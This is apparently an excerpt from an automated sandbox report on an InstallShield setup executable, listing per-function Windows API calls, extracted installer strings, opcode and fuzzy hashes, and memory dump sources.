• Opcode Fuzzy Hash: 623eb78449de06c9fc923b3259e1353a90a62daa14e54a208505cf88229414fe
• Instruction Fuzzy Hash: 20214172900218ABD710EB54CC45FEAB7BCFB08759F0045AEB519E3191EB78AB448B94
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004563F1
  • Part of subcall function 0040F99A: __EH_prolog3_GS.LIBCMT ref: 0040F9A4
  • Part of subcall function 004331B2: __EH_prolog3_GS.LIBCMT ref: 004331B9
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 004589E8: __EH_prolog3_GS.LIBCMT ref: 004589EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorLast$H_prolog3
• String ID: .EXE$HsG$SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 3033373895-1555161118
• Opcode ID: b8efbc7d32b1d0c03c7422236b8a6e94af8016e4b88016080c3c99625493db37
• Instruction ID: a9541f351755fa5af9082140158e7c384e609ca91e5a70eea092a6782f5e6089
• Opcode Fuzzy Hash: b8efbc7d32b1d0c03c7422236b8a6e94af8016e4b88016080c3c99625493db37
• Instruction Fuzzy Hash: D921B6B1801204BADB00FFA5C8535DE7B689F15358F50445FFC09AB292EB39460EC7D9
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CountH_prolog3_Tick
• String ID: SplashTime$Startup
• API String ID: 2349883465-926283664
• Opcode ID: 278945ba514fa351542ebb51b170e1af732bfb0141513c739876c3e692eddbcc
• Instruction ID: a642b54ca2eb9fae89e9f0954061d03fed2642df482e6e3707699119b450d2a8
• Opcode Fuzzy Hash: 278945ba514fa351542ebb51b170e1af732bfb0141513c739876c3e692eddbcc
• Instruction Fuzzy Hash: BC21F534904618AEEB24DBB5CC55BED7BB4AF01304F6500AFF801A72D2DB795989CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0041603C
  • Part of subcall function 0041618B: __EH_prolog3.LIBCMT ref: 00416192
  • Part of subcall function 0041618B: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000004,0045D722,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100), ref: 004161AE
  • Part of subcall function 0041618B: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4), ref: 004161BE
• GetDesktopWindow.USER32 ref: 00416094
  • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
• QueryPerformanceFrequency.KERNEL32(?), ref: 004160E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CreateEventH_prolog3$DesktopFrequencyPerformanceQueryWindow_malloc
• String ID: HsG
• API String ID: 3435033758-1835203436
• Opcode ID: a5cb22c5a949a6c6b7a34181e198b846f5d14767d0747c5c675e951ea848145e
• Instruction ID: f8c9ebf2e94ac5d54ce2366671be5678a5ced366b5f8eee2c8d3db243b58cd02
• Opcode Fuzzy Hash: a5cb22c5a949a6c6b7a34181e198b846f5d14767d0747c5c675e951ea848145e
• Instruction Fuzzy Hash: 7B31D2B0904B44DFD720DF7A858138AFBF0BB08304F90896E959E97742CB79A584DF15
Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041C2D0
• GetLastError.KERNEL32(0000003C,0043412D,no_engine,?,00000001,?,?,00000001,?,?,00000000,0000000A,Startup,?,00000001,ScriptDriven), ref: 0041C2FB
• SetLastError.KERNEL32(?), ref: 0041C334
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_
• String ID: HsG
• API String ID: 3339191932-1835203436
• Opcode ID: 20e62f0c2ec7f2c74fc7673461cc99b8a8fcbc9d3eec5d733313c3d3a8af00b6
• Instruction ID: 62cb9a81948d1d56b77c4fd3a2d0143701c0b1730441d78e08ff4d519215b56b
• Opcode Fuzzy Hash: 20e62f0c2ec7f2c74fc7673461cc99b8a8fcbc9d3eec5d733313c3d3a8af00b6
• Instruction Fuzzy Hash: E221B070900645EFDB00DFA4C98469DBBB4FF14304F14815EF804A7792C7B8EA41CB84
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpy$H_prolog3_
• String ID: |LJ
• API String ID: 3091677954-1752162465
• Opcode ID: c28049ed4bff5508e8d0906e59bdb8800d9726610d951e9cca53c0e8368b285c
• Instruction ID: 52bb43b2b89eb870e515fe47fe89b4839b49d492b860031220af9519a339598b
• Opcode Fuzzy Hash: c28049ed4bff5508e8d0906e59bdb8800d9726610d951e9cca53c0e8368b285c
• Instruction Fuzzy Hash: AC11E772901A11BBD710AB96CC49E9F7768EF59304F10415AF509A3152CF78AA05CB6D
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: Extracting setup.ini...$session.cpp$|LJ
• API String ID: 2427045233-2894076531
• Opcode ID: c00bc900b6e87426a2388762658d67cfe78a6c96a48608b81b26b3bfaf16d7ca
• Instruction ID: 5127aa001cf11088d37934927bdc7d0d6560b95a0499f84f879ebea9d0f8d96a
• Opcode Fuzzy Hash: c00bc900b6e87426a2388762658d67cfe78a6c96a48608b81b26b3bfaf16d7ca
• Instruction Fuzzy Hash: AA119170600208ABEB15EBA5CC91BEE76686B95358F64413FF401A71D2DBBC5A09C75C
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00456CBF
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• UuidToStringW.RPCRT4(?,?), ref: 00456CFF
  • Part of subcall function 00459275: __EH_prolog3.LIBCMT ref: 0045927C
  • Part of subcall function 00459275: CharUpperW.USER32(00000000,?,00000008,0000000C,00456D2A,00483E18), ref: 0045929E
• RpcStringFreeW.RPCRT4(00000000), ref: 00456D2E
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$String$Free$H_prolog3$CharH_prolog3_UpperUuid
• String ID: HsG
• API String ID: 1620240345-1835203436
• Opcode ID: f3da9a06632e1c675204edba0b50f9af05f9e438436560d617572d9ae178c0cb
• Instruction ID: d24855ae23804708f9657643eff9035aa9f7aeb912aa3f98b943b46fcc39d6b4
• Opcode Fuzzy Hash: f3da9a06632e1c675204edba0b50f9af05f9e438436560d617572d9ae178c0cb
• Instruction Fuzzy Hash: D3113D71900618DBDB00EFD1CC95BEEB3B9BF04305F40402AF906AB195DB789E09CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
  • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
• RegQueryValueExW.ADVAPI32(00000000,DoVerboseLogging,00000000,?,?,?), ref: 0040163D
• RegCloseKey.ADVAPI32(00000000), ref: 0040165D
Strings
• SOFTWARE\InstallShield\24.0\Professional, xrefs: 004015ED
• DoVerboseLogging, xrefs: 00401629
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Close$HandleModuleQueryValue
• String ID: DoVerboseLogging$SOFTWARE\InstallShield\24.0\Professional
• API String ID: 2971604672-1143489823
• Opcode ID: 992b17fd394f65c8631625403619c4111f21bfa462fd2a9ff2ff8759e5b327bc
• Instruction ID: b8d5da7c66694fb68f9347787991ccd354379e7a8fa7ff93a32c878f4c705014
• Opcode Fuzzy Hash: 992b17fd394f65c8631625403619c4111f21bfa462fd2a9ff2ff8759e5b327bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D017C71941219ABDB10EF90CC45BEFBBBCAB14709F140566E905B3290D3BA5B48CBD9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040C656
• SetLastError.KERNEL32(00000000,00000000,0040C974,00000000,?), ref: 0040C6CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last
• String ID: HsG$m<H
• API String ID: 1018228973-3913731857
• Opcode ID: 8cf3a0a999b89bcb033bf6d8dc2d302470aa6ffe6800c7849b1526259a407428
• Instruction ID: d825e472a561230fa74be267a8af8d30e25b86a91737dd089b8851c6b07c70dc
• Opcode Fuzzy Hash: 8cf3a0a999b89bcb033bf6d8dc2d302470aa6ffe6800c7849b1526259a407428
• Instruction Fuzzy Hash: 6211C431500204EBE721EF50CD45BAE7B64AF10318F24896FF8466B2D2DBBA9E05D798
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 00436D9B
  • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
• lstrlenW.KERNEL32(?,Startup,ClickOncePackage,00483E18,?,00000400), ref: 00436DCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3__memsetlstrlen
• String ID: ClickOncePackage$Startup
• API String ID: 1437836783-2858441910
• Opcode ID: ea71743ab89a5ca5303532964b9c085456cf6fdda5492b1745845f7143a06986
• Instruction ID: 00cab8686a5252d2d403d26306d96d7645744e35640d156a439eb197855bdaf6
• Opcode Fuzzy Hash: ea71743ab89a5ca5303532964b9c085456cf6fdda5492b1745845f7143a06986
• Instruction Fuzzy Hash: 4D01DBA5A402186AD710EB64DD42BEA73E8BB04704F0194BBA545D3181DA74DD4C8798
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00454A25
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00454A40
  • Part of subcall function 00433B38: __EH_prolog3.LIBCMT ref: 00433B3F
  • Part of subcall function 00433B38: GetLastError.KERNEL32(00000004,0043383A,00000008,0043899A,0047C4E4,00000001,?,00000001), ref: 00433B58
• __CxxThrowException@8.LIBCMT ref: 00454A61
  • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: DirectoryErrorExceptionException@8H_prolog3H_prolog3_LastRaiseThrowWindows
• String ID: HsG
• API String ID: 1535131608-1835203436
• Opcode ID: 7df2d63a109fe508e11848c9e03216674d95b0a4fde9a4f468ac0587a1fdcc2c
• Instruction ID: 738dcb46aa4ec7d92096cdf70d8b8e4eca770e8a71218333f8b7bfe85e45d998
• Opcode Fuzzy Hash: 7df2d63a109fe508e11848c9e03216674d95b0a4fde9a4f468ac0587a1fdcc2c
• Instruction Fuzzy Hash: 4A116170940218ABDB60EB51CC89BEDB378EF54305F9041EAB50CA7191DB785B89CF48
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041F4B9
• __itow_s.LIBCMT ref: 0041F4F0
• SetLastError.KERNEL32(00000006,?,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F51F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last__itow_s
• String ID: HsG
• API String ID: 3681815494-1835203436
• Opcode ID: 141a998db04d8435969142fc884c128a1dd653a3268565f93a54bea6e730b0b4
• Instruction ID: 72fed4a1c090c88f25d5264139b5968bc905611f59b8789e4007883ab4b7c8e0
• Opcode Fuzzy Hash: 141a998db04d8435969142fc884c128a1dd653a3268565f93a54bea6e730b0b4
• Instruction Fuzzy Hash: 80019E71800208ABEB20FFA1DA45DAEB7B5FB40714F54812EF9459B181DBB99945CB48
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0040C408
• GetLastError.KERNEL32(00000004,0040C5BD,?,00000008,?,00000000,00000000,00000004,00410069,?,00000008,?,?,00000001,00000008,004107EF), ref: 0040C42A
• SetLastError.KERNEL32(00000000,00000000,00000008,?,00000000,?,00000008,?,?,00000001,00000008,004107EF,?,00000001,000000FF,?), ref: 0040C473
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: 6a687fc130528b7c81639662b604ace4c907064117be3216f3bd9b2d491dd4ca
• Instruction ID: 31aa934b069825b4e2f92146ce4853e7872e7a01a0153d36dc74fde3a21ee056
• Opcode Fuzzy Hash: 6a687fc130528b7c81639662b604ace4c907064117be3216f3bd9b2d491dd4ca
• Instruction Fuzzy Hash: 62118071500646EFDB01DF68C949699BFB1FF08314F15826AF5089B791C7B4E950DF88
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00454AD7
• WriteFile.KERNEL32(?,?,?,?,00000000,00000088,0045955F,0000BBEF,00000003), ref: 00454AFB
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00433811: __EH_prolog3.LIBCMT ref: 00433818
• __CxxThrowException@8.LIBCMT ref: 00454B40
  • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3Last$ExceptionException@8FileH_prolog3_RaiseThrowWrite
• String ID: HsG
• API String ID: 3362004152-1835203436
• Opcode ID: 883f4af8b5c66e78b3749607076bf04ce6366cd34e25dcc2b72bc5b708a6ef03
• Instruction ID: e47136b30ef714f49e2d0af0fa4202cd294e561ce9fbfd014f3520b77fbf3fc5
• Opcode Fuzzy Hash: 883f4af8b5c66e78b3749607076bf04ce6366cd34e25dcc2b72bc5b708a6ef03
• Instruction Fuzzy Hash: 56018FB1500108AFDB10EBA0CC81FEEB378FF04308F40826EB509A6181EB749E49CB58
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043FBFD
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
• wsprintfW.USER32 ref: 0043FC3F
• wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
  • Part of subcall function 0043F412: __EH_prolog3_GS.LIBCMT ref: 0043F41C
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorFreeLastString$wsprintfwvsprintf
• String ID: %d: %s
• API String ID: 244791219-204819183
• Opcode ID: c6aa90fd246b48e40723a5880c24c4db7e7b03834f27aec6cc7b718825f7c7da
• Instruction ID: f12eb98d6b1ce231bb8698339f195804834364bc8a70b3b7ddbbb2d88254e369
• Opcode Fuzzy Hash: c6aa90fd246b48e40723a5880c24c4db7e7b03834f27aec6cc7b718825f7c7da
• Instruction Fuzzy Hash: 460129B1904119ABDF20EBA0CC45ADD73BCBB04318F5041AAF619A6091DA389B89CF5C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,00421B3C,?,?,00000000,?,?,?,?,?,?), ref: 0042A59C
• GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0042A5AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegCreateKeyTransactedW
• API String ID: 1646373207-2994018265
• Opcode ID: 1a8a3d637dfd505bb417a7343b352d1ef99116b66e455568e02bca749859dc77
• Instruction ID: d3a5c6ffab105312c75843d50b8a9f516f585f06e62e099db6795ced55b706cd
• Opcode Fuzzy Hash: 1a8a3d637dfd505bb417a7343b352d1ef99116b66e455568e02bca749859dc77
• Instruction Fuzzy Hash: 35F04F32200119FFCF125F90ED04BEB7BAAEF08755F554426FA49A0060C776C9B0EB95
Uniqueness
Uniqueness Score: -1.00%
